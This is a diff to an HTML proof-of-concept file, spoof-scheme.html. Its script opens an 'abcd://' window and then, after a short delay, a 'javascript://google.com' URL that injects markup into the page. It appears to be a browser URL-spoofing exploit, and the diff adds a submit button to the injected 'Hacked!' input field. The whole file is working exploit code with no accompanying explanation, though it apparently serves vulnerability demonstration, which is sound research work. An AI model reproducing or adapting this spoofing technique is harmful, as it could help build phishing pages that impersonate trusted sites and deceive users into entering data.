--- a/spoof-scheme.html
+++ b/spoof-scheme.html
@@ -2,7 +2,7 @@
 function a(){
 	window.open("abcd://google.com", "x");
 	setTimeout(function(){
-		window.open("javascript://google.com/search?q=google.com&source=/%0adocument.body.innerHTML='%3Cinput%20type%3D%22text%22%20value%3D%22Hacked!%22%20style%3D%22color%3Ared%3B%22%3E'", "x");
+		window.open("javascript://google.com/search?q=google.com&source=/%0adocument.body.innerHTML='%3Cinput%20type%3D%22text%22%20value%3D%22Hacked!%22%20style%3D%22color%3Ared%3B%22%3E%3Cbutton%20type%3D%22submit%22%3ESend%3C%2Fbutton%3E'", "x");
 	}, 111);
 }
 </script> 
